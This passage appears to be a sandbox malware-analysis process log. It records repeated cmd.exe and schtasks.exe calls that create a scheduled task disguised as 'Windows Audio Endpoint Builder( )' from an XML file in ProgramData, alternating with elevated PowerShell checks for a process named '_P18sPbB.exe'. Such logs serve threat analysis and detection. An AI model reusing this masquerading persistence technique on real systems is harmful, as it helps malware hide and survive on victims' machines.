Target ID:67
Start time:10:10:11
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:10:10:12
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:10:10:12
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:10:10:12
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:10:10:17
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:10:10:17
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:10:10:18
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:10:10:18
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:75
                                                                                                                  Start time:10:10:18
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:76
                                                                                                                  Start time:10:10:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:77
                                                                                                                  Start time:10:10:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:78
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:79
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:80
                                                                                                                  Start time:10:10:24
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:81
                                                                                                                  Start time:10:10:29
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:82
                                                                                                                  Start time:10:10:29
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:83
                                                                                                                  Start time:10:10:30
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:84
                                                                                                                  Start time:10:10:31
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:85
                                                                                                                  Start time:10:10:31
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:86
                                                                                                                  Start time:10:10:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:87
                                                                                                                  Start time:10:10:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:88
                                                                                                                  Start time:10:10:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:89
                                                                                                                  Start time:10:10:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 90
Start time: 10:10:37
Start date: 29/12/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase: 0x300000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 91
Start time: 10:10:40
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 92
Start time: 10:10:40
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 93
Start time: 10:10:43
Start date: 29/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 94
Start time: 10:10:43
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 95
Start time: 10:10:45
Start date: 29/12/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase: 0x300000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 96
Start time: 10:10:47
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 97
Start time: 10:10:47
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 98
Start time: 10:10:53
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 99
Start time: 10:10:53
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 100
Start time: 10:10:55
Start date: 29/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 101
Start time: 10:10:59
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 102
Start time: 10:10:59
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 103
Start time: 10:10:59
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 104
Start time: 10:11:05
Start date: 29/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 105
Start time: 10:11:05
Start date: 29/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 106
Start time: 10:11:05
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 107
Start time: 10:11:10
Start date: 29/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

                                                                                                                  Target ID:108
                                                                                                                  Start time:10:11:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:109
                                                                                                                  Start time:10:11:13
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:110
                                                                                                                  Start time:10:11:17
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:111
                                                                                                                  Start time:10:11:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:112
                                                                                                                  Start time:10:11:20
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:113
                                                                                                                  Start time:10:11:22
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:114
                                                                                                                  Start time:10:11:23
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:115
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:116
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:117
                                                                                                                  Start time:10:11:28
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  Target ID:118
                                                                                                                  Start time:10:11:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:119
                                                                                                                  Start time:10:11:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:120
                                                                                                                  Start time:10:11:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
